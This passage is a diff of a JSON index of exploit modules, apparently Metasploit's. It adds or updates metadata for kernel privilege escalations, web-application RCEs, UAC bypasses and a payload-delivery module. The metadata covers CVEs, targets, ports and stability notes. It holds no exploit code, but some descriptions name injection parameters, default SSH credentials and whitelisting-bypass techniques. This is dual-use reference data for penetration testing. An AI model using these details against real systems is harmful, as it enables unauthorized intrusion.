+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-12-14 21:40:18 +0000",
+    "path": "/modules/exploits/linux/local/bash_profile_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/bash_profile_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
    "name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
    "fullname": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -59542,7 +59991,7 @@
      "jannh <jannh@google.com>",
      "h00die <mike@shorebreaksecurity.com>"
    ],
-    "description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n        does not properly reference count file descriptors, resulting\n        in a use-after-free, which can be abused to escalate privileges.\n\n        The target system must be compiled with `CONFIG_BPF_SYSCALL`\n        and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n        This module has been tested successfully on:\n\n        Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel);\n        Ubuntu 16.04 (x64) kernel 4.4.0-38-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-42-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-98-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.",
+    "description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n        does not properly reference count file descriptors, resulting\n        in a use-after-free, which can be abused to escalate privileges.\n\n        The target system must be compiled with `CONFIG_BPF_SYSCALL`\n        and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n        Note, this module will overwrite the first few lines\n        of `/etc/crontab` with a new cron job. The job will\n        need to be manually removed.\n\n        This module has been tested successfully on Ubuntu 16.04 (x64)\n        kernel 4.4.0-21-generic (default kernel).",
    "references": [
      "BID-90309",
      "CVE-2016-4557",
@@ -59567,7 +60016,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2018-12-15 05:39:50 +0000",
+    "mod_time": "2019-12-26 16:21:44 +0000",
    "path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bpf_priv_esc",
@@ -60347,16 +60796,21 @@
    "type": "exploit",
    "author": [
      "h00die <mike@stcyrsecurity.com>",
-      "vnik"
+      "vnik",
+      "Jesse Hertz",
+      "Tim Newsham"
    ],
-    "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n          only works against Ubuntu 16.04 (not 16.04.1) with kernel\n          4.4.0-21-generic.\n          Several conditions have to be met for successful exploitation:\n          Ubuntu:\n          1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n          2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n          Kernel 4.4.0-31-generic and newer are not vulnerable.\n\n          We write the ascii files and compile on target instead of locally since metasm bombs for not\n          having cdefs.h (even if locally installed)",
+    "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n          only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic.\n\n          Several conditions have to be met for successful exploitation:\n          Ubuntu:\n          1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n          2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n          Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP.\n\n          We write the ascii files and compile on target instead of locally since metasm bombs for not\n          having cdefs.h (even if locally installed)",
    "references": [
      "EDB-40049",
      "CVE-2016-4997",
-      "URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c"
+      "CVE-2016-4998",
+      "URL-https://www.openwall.com/lists/oss-security/2016/06/24/5",
+      "URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91"
    ],
    "platform": "Linux",
-    "arch": "x86",
+    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": [

@@ -60367,7 +60821,7 @@
    "targets": [
      "Ubuntu"
    ],
-    "mod_time": "2018-10-10 14:12:29 +0000",
+    "mod_time": "2019-12-15 07:17:42 +0000",
    "path": "/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb",
    "is_install_path": true,
    "ref_name": "linux/local/netfilter_priv_esc_ipv4",
@@ -60375,6 +60829,12 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
    },
    "needs_cleanup": true
  },
@@ -60740,11 +61200,11 @@
    },
    "needs_cleanup": null
  },
-  "exploit_linux/local/rds_priv_esc": {
-    "name": "Reliable Datagram Sockets (RDS) Privilege Escalation",
-    "fullname": "exploit/linux/local/rds_priv_esc",
+  "exploit_linux/local/rds_rds_page_copy_user_priv_esc": {
+    "name": "Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation",
+    "fullname": "exploit/linux/local/rds_rds_page_copy_user_priv_esc",
    "aliases": [
-
+      "exploit/linux/local/rds_priv_esc"
    ],
    "rank": 500,
    "disclosure_date": "2010-10-20",
@@ -60753,7 +61213,7 @@
      "Dan Rosenberg",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in the rds_page_copy_user function\n        in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n        to execute code as root (CVE-2010-3904).\n\n        This module has been tested successfully on Fedora 13 (i686) with\n        kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)\n        with kernel version 2.6.32-21-generic.",
+    "description": "This module exploits a vulnerability in the `rds_page_copy_user` function\n        in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n        to execute code as root (CVE-2010-3904).\n\n        This module has been tested successfully on:\n\n        Fedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE; and\n        Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic.",
    "references": [
      "EDB-15285",
      "CVE-2010-3904",
@@ -60776,16 +61236,25 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
-    "path": "/modules/exploits/linux/local/rds_priv_esc.rb",
+    "mod_time": "2019-12-22 10:20:00 +0000",
+    "path": "/modules/exploits/linux/local/rds_rds_page_copy_user_priv_esc.rb",
    "is_install_path": true,
-    "ref_name": "linux/local/rds_priv_esc",
+    "ref_name": "linux/local/rds_rds_page_copy_user_priv_esc",
    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
      "AKA": [
        "rds-fail.c"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
      ]
    },
    "needs_cleanup": true
@@ -60834,6 +61303,53 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/local/reptile_rootkit_reptile_cmd_priv_esc": {
+    "name": "Reptile Rootkit reptile_cmd Privilege Escalation",
+    "fullname": "exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-10-29",
+    "type": "exploit",
+    "author": [
+      "f0rb1dd3n",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n        to gain root privileges using the `root` command.\n\n        This module has been tested successfully with Reptile from `master`\n        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).",
+    "references": [
+      "URL-https://github.com/f0rb1dd3n/Reptile",
+      "URL-https://github.com/f0rb1dd3n/Reptile/wiki/Usage"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2019-12-11 06:48:51 +0000",
+    "path": "/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/reptile_rootkit_reptile_cmd_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/local/service_persistence": {
    "name": "Service Persistence",
    "fullname": "exploit/linux/local/service_persistence",
@@ -62966,11 +63482,11 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-07-28 21:38:54 +0000",
+    "mod_time": "2019-12-09 20:09:52 +0000",
    "path": "/modules/exploits/linux/redis/redis_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/redis/redis_unauth_exec",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -63322,7 +63838,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
    "path": "/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/smtp/exim_gethostbyname_bof",
@@ -63330,6 +63846,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "ghost"
+      ]
    },
    "needs_cleanup": null
  },
@@ -63366,7 +63885,7 @@
      "linux x64",
      "linux x86"
    ],
-    "mod_time": "2018-12-14 22:27:11 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/exploits/linux/smtp/haraka.py",
    "is_install_path": true,
    "ref_name": "linux/smtp/haraka",
@@ -63789,7 +64308,7 @@
    "needs_cleanup": null
  },
  "exploit_linux/ssh/solarwinds_lem_exec": {
-    "name": "SolarWind LEM Default SSH Password Remote Code Execution",
+    "name": "SolarWinds LEM Default SSH Password Remote Code Execution",
    "fullname": "exploit/linux/ssh/solarwinds_lem_exec",
    "aliases": [

@@ -63800,7 +64319,7 @@
    "author": [
      "Mehmet Ince <mehmet@mehmetince.net>"
    ],
-    "description": "This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH\n        service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n        vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n        This module was tested against SolarWinds LEM v6.3.1.",
+    "description": "This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH\n        service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n        vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n        This module was tested against SolarWinds LEM v6.3.1.",
    "references": [
      "CVE-2017-7722",
      "URL-http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/"
@@ -63817,7 +64336,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2019-12-11 13:42:41 +0000",
    "path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/solarwinds_lem_exec",
@@ -68433,7 +68952,7 @@
      "Drupal 7.0 - 7.31 (form-cache PHP injection method)",
      "Drupal 7.0 - 7.31 (user-post PHP injection method)"
    ],
-    "mod_time": "2018-01-03 23:10:16 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
    "path": "/modules/exploits/multi/http/drupal_drupageddon.rb",
    "is_install_path": true,
    "ref_name": "multi/http/drupal_drupageddon",
@@ -68441,6 +68960,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "Drupageddon"
+      ]
    },
    "needs_cleanup": null
  },
@@ -72013,6 +72535,59 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/openmrs_deserialization": {
+    "name": "OpenMRS Java Deserialization RCE",
+    "fullname": "exploit/multi/http/openmrs_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-02-04",
+    "type": "exploit",
+    "author": [
+      "Nicolas Serra",
+      "mpgn",
+      "Shelby Pace"
+    ],
+    "description": "OpenMRS is an open-source platform that supplies\n        users with a customizable medical record system.\n\n        There exists an object deserialization vulnerability\n        in the `webservices.rest` module used in OpenMRS Platform.\n        Unauthenticated remote code execution can be achieved\n        by sending a malicious XML payload to a Rest API endpoint\n        such as `/ws/rest/v1/concept`.\n\n        This module uses an XML payload generated with Marshalsec\n        that targets the ImageIO component of the XStream library.\n\n        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java\n        8 and Java 9.",
+    "references": [
+      "CVE-2018-19276",
+      "URL-https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607",
+      "URL-https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization",
+      "URL-https://github.com/mpgn/CVE-2018-19276/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2019-12-04 12:17:35 +0000",
+    "path": "/modules/exploits/multi/http/openmrs_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/openmrs_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/openx_backdoor_php": {
    "name": "OpenX Backdoor PHP Code Execution",
    "fullname": "exploit/multi/http/openx_backdoor_php",
@@ -74637,7 +75212,7 @@
      "Splunk >= 5.0.1 / Linux",
      "Splunk >= 5.0.1 / Windows"
    ],
-    "mod_time": "2019-03-19 15:28:24 +0000",
+    "mod_time": "2019-11-26 15:38:34 +0000",
    "path": "/modules/exploits/multi/http/splunk_upload_app_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/splunk_upload_app_exec",
@@ -76359,6 +76934,68 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/vbulletin_widgetconfig_rce": {
+    "name": "vBulletin widgetConfig RCE",
+    "fullname": "exploit/multi/http/vbulletin_widgetconfig_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-23",
+    "type": "exploit",
+    "author": [
+      "unknown",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]\n        parameter in an ajax/render/widget_php routestring POST request.",
+    "references": [
+      "CVE-2019-16759",
+      "URL-https://seclists.org/fulldisclosure/2019/Sep/31",
+      "URL-https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html"
+    ],
+    "platform": "PHP,Unix,Windows",
+    "arch": "cmd, php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Meterpreter (PHP In-Memory)",
+      "Unix (CMD In-Memory)",
+      "Windows (CMD In-Memory)"
+    ],
+    "mod_time": "2019-12-10 12:10:04 +0000",
+    "path": "/modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/vbulletin_widgetconfig_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/visual_mining_netcharts_upload": {
    "name": "Visual Mining NetCharts Server Remote Code Execution",
    "fullname": "exploit/multi/http/visual_mining_netcharts_upload",
@@ -80009,7 +80646,8 @@
      "Casey Smith",
      "Trenton Ivey",
      "g0tmi1k",
-      "bcoles <bcoles@gmail.com>"
+      "bcoles <bcoles@gmail.com>",
+      "phra"
    ],
    "description": "This module quickly fires up a web server that serves a payload.\n        The provided command which will allow for a payload to download and execute.\n        It will do it either specified scripting language interpreter or \"squiblydoo\" via regsvr32.exe\n        for bypassing application whitelisting. The main purpose of this module is to quickly establish\n        a session on a target machine when the attacker has to manually type in the command:\n        e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.\n        This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege\n        escalations supplied by Meterpreter.\n\n        When using either of the PSH targets, ensure the payload architecture matches the target computer\n        or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.\n\n        Regsvr32 uses \"squiblydoo\" technique for bypassing application whitelisting.\n        The signed Microsoft binary file, Regsvr32, is able to request an .sct file\n        and then execute the included PowerShell command inside of it.\n\n        Similarly, the pubprn target uses the pubprn.vbs script to request and\n        execute a .sct file.\n\n        Both web requests (i.e., the .sct file and PowerShell download/execute)\n        can occur on the same port.\n\n        \"PSH (Binary)\" will write a file to the disk, allowing for custom binaries\n        to be served up to be downloaded and executed.",
    "references": [
@@ -80018,9 +80656,10 @@
      "URL-http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/",
      "URL-https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html",
      "URL-https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html",
-      "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/"
+      "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/",
+      "URL-https://iwantmore.pizza/posts/amsi.html"
    ],
-    "platform": "Linux,PHP,Python,Windows",
+    "platform": "Linux,OSX,PHP,Python,Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": [
@@ -80036,9 +80675,10 @@
      "Regsvr32",
      "pubprn",
      "PSH (Binary)",
-      "Linux"
+      "Linux",
+      "Mac OS X"
    ],
-    "mod_time": "2019-07-12 23:16:43 +0000",
+    "mod_time": "2020-01-09 15:02:04 +0000",
    "path": "/modules/exploits/multi/script/web_delivery.rb",
    "is_install_path": true,
    "ref_name": "multi/script/web_delivery",
@@ -80440,6 +81080,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_openbsd/local/dynamic_loader_chpass_privesc": {
+    "name": "OpenBSD Dynamic Loader chpass Privilege Escalation",
+    "fullname": "exploit/openbsd/local/dynamic_loader_chpass_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-11",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n        dynamic loader (CVE-2019-19726).\n\n        The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n        environment variable when set with approximately `ARG_MAX` colons.\n\n        This can be abused to load `libutil.so` from an untrusted path,\n        using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n        executable, resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        OpenBSD 6.1 (amd64); and\n        OpenBSD 6.6 (amd64)",
+    "references": [
+      "CVE-2019-19726",
+      "EDB-47780",
+      "URL-https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726",
+      "URL-https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt",
+      "URL-https://www.openwall.com/lists/oss-security/2019/12/11/9",
+      "URL-https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass",
+      "URL-https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig"
+    ],
+    "platform": "BSD,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-12-22 08:46:43 +0000",
+    "path": "/modules/exploits/openbsd/local/dynamic_loader_chpass_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "openbsd/local/dynamic_loader_chpass_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_osx/afp/loginext": {
    "name": "AppleFileServer LoginExt PathName Overflow",
    "fullname": "exploit/osx/afp/loginext",
@@ -83540,7 +84226,7 @@
    ],
    "platform": "Unix",
    "arch": "cmd",
-    "rport": 80,
+    "rport": 22,
    "autofilter_ports": [
      80,
      8080,
@@ -84453,7 +85139,7 @@
    "targets": [
      "@(#)version.c       5.51 (Berkeley) 5/2/86"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-12-23 19:02:13 +0000",
    "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -84703,6 +85389,55 @@
    },
    "needs_cleanup": null
  },
+  "exploit_unix/webapp/ajenti_auth_username_cmd_injection": {
+    "name": "Ajenti auth username Command Injection",
+    "fullname": "exploit/unix/webapp/ajenti_auth_username_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-10-14",
+    "type": "exploit",
+    "author": [
+      "Jeremy Brown",
+      "Onur ER <onur@onurer.net>"
+    ],
+    "description": "This module exploits a command injection in Ajenti == 2.1.31.\n        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.",
+    "references": [
+      "EDB-47497"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 8000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Ajenti == 2.1.31"
+    ],
+    "mod_time": "2019-11-20 19:09:24 +0000",
+    "path": "/modules/exploits/unix/webapp/ajenti_auth_username_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/ajenti_auth_username_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/arkeia_upload_exec": {
    "name": "Western Digital Arkeia Remote Code Execution",
    "fullname": "exploit/unix/webapp/arkeia_upload_exec",
@@ -89929,70 +90664,6 @@
    },
    "needs_cleanup": null
  },
-  "exploit_unix/webapp/webmin_backdoor": {
-    "name": "Webmin password_change.cgi Backdoor",
-    "fullname": "exploit/unix/webapp/webmin_backdoor",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2019-08-10",
-    "type": "exploit",
-    "author": [
-      "AkkuS",
-      "wvu <wvu@metasploit.com>"
-    ],
-    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
-    "references": [
-      "CVE-2019-15107",
-      "URL-http://www.webmin.com/exploit.html",
-      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
-      "URL-https://blog.firosolutions.com/exploits/webmin/",
-      "URL-https://github.com/webmin/webmin/issues/947"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64",
-    "rport": 10000,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic (Unix In-Memory)",
-      "Automatic (Linux Dropper)"
-    ],
-    "mod_time": "2019-08-21 17:42:54 +0000",
-    "path": "/modules/exploits/unix/webapp/webmin_backdoor.rb",
-    "is_install_path": true,
-    "ref_name": "unix/webapp/webmin_backdoor",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "SideEffects": [
-        "ioc-in-logs",
-        "artifacts-on-disk"
-      ]
-    },
-    "needs_cleanup": null
-  },
  "exploit_unix/webapp/webmin_show_cgi_exec": {
    "name": "Webmin /file/show.cgi Remote Command Execution",
    "fullname": "exploit/unix/webapp/webmin_show_cgi_exec",
@@ -91165,6 +91836,56 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/wp_plainview_activity_monitor_rce": {
+    "name": "Wordpress Plainview Activity Monitor RCE",
+    "fullname": "exploit/unix/webapp/wp_plainview_activity_monitor_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-08-26",
+    "type": "exploit",
+    "author": [
+      "LydA(c)ric LEFEBVRE",
+      "Leo LE BOUTER"
+    ],
+    "description": "Plainview Activity Monitor Wordpress plugin is vulnerable to OS\n          command injection which allows an attacker to remotely execute\n          commands on underlying system. Application passes unsafe user supplied\n          data to ip parameter into activities_overview.php.\n          Privileges are required in order to exploit this vulnerability.\n\n          Vulnerable plugin version: 20161228 and possibly prior\n          Fixed plugin version: 20180826",
+    "references": [
+      "CVE-2018-15877",
+      "EDB-45274"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "WordPress"
+    ],
+    "mod_time": "2019-11-28 20:13:21 +0000",
+    "path": "/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/wp_plainview_activity_monitor_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/wp_platform_exec": {
    "name": "WordPress Platform Theme File Upload Vulnerability",
    "fullname": "exploit/unix/webapp/wp_platform_exec",
@@ -110104,7 +110825,7 @@
    "targets": [
      "Windows 7 SP1 / Office 2010 SP2 / Office 2013"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-10 09:53:13 +0000",
    "path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms14_060_sandworm",
@@ -110112,6 +110833,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "sandworm"
+      ]
    },
    "needs_cleanup": null
  },
@@ -117933,7 +118657,7 @@
      "Efmws 5.3 Universal",
      "Efmws 4.0 Universal"
    ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-01-05 21:39:34 +0000",
    "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/efs_fmws_userid_bof",
@@ -126393,6 +127117,51 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/bypassuac_dotnet_profiler": {
+    "name": "Windows Escalate UAC Protection Bypass (Via dot net profiler)",
+    "fullname": "exploit/windows/local/bypassuac_dotnet_profiler",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2017-03-17",
+    "type": "exploit",
+    "author": [
+      "Casey Smith",
+      "\"Stefan Kanthak\" <stefan.kanthak () nexgo de>",
+      "bwatters-r7"
+    ],
+    "description": "Microsoft Windows allows for the automatic loading of a profiling COM object during\n      the launch of a CLR process based on certain environment variables ostensibly to\n      monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL\n      that will be launched as the profiling thread.  This thread will run at the permission\n      level of the calling process, so an auto-elevating process will launch the DLL with\n      elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR\n      process, but others would work, too.",
+    "references": [
+      "URL-https://seclists.org/fulldisclosure/2017/Jul/11",
+      "URL-https://offsec.provadys.com/UAC-bypass-dotnet.html"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-11-18 12:57:33 +0000",
+    "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/bypassuac_dotnet_profiler",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/bypassuac_eventvwr": {
    "name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)",
    "fullname": "exploit/windows/local/bypassuac_eventvwr",
@@ -126565,6 +127334,52 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/bypassuac_sdclt": {
+    "name": "Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)",
